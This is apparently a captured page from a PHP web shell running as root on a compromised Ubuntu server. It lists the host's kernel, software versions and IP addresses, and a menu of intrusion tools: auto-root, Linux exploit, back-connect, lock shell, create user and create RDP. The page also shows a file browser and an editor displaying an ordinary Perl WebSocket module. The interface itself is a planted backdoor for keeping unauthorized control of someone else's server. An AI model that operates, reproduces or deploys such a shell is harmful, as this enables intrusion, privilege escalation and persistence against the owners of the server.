Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
webmin /
vendor_perl /
Protocol /
WebSocket /
[ HOME SHELL ]
Name
Size
Permission
Action
Cookie
[ DIR ]
drwxr-xr-x
Handshake
[ DIR ]
drwxr-xr-x
Client.pm
3.52
KB
-rw-r--r--
Cookie.pm
1.64
KB
-rw-r--r--
Frame.pm
10.81
KB
-rw-r--r--
Handshake.pm
1.09
KB
-rw-r--r--
Message.pm
4.65
KB
-rw-r--r--
Request.pm
12.95
KB
-rw-r--r--
Response.pm
8.24
KB
-rw-r--r--
Stateful.pm
795
B
-rw-r--r--
URL.pm
2.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Handshake.pm
package Protocol::WebSocket::Handshake; use strict; use warnings; use Protocol::WebSocket::Request; use Protocol::WebSocket::Response; sub new { my $class = shift; $class = ref $class if ref $class; my $self = {@_}; bless $self, $class; return $self; } sub error { @_ > 1 ? $_[0]->{error} = $_[1] : $_[0]->{error} } sub version { $_[0]->req->version } sub req { shift->{req} ||= Protocol::WebSocket::Request->new } sub res { shift->{res} ||= Protocol::WebSocket::Response->new } 1; __END__ =head1 NAME Protocol::WebSocket::Handshake - Base WebSocket Handshake class =head1 DESCRIPTION This is a base class for L<Protocol::WebSocket::Handshake::Client> and L<Protocol::WebSocket::Handshake::Server>. =head1 ATTRIBUTES =head2 C<error> $handshake->error; Set or get handshake error. =head2 C<version> $handshake->version; Set or get handshake version. =head1 METHODS =head2 C<new> Create a new L<Protocol::WebSocket::Handshake> instance. =head2 C<req> $handshake->req; WebSocket request object. =head2 C<res> $handshake->res; WebSocket response object. =cut
Close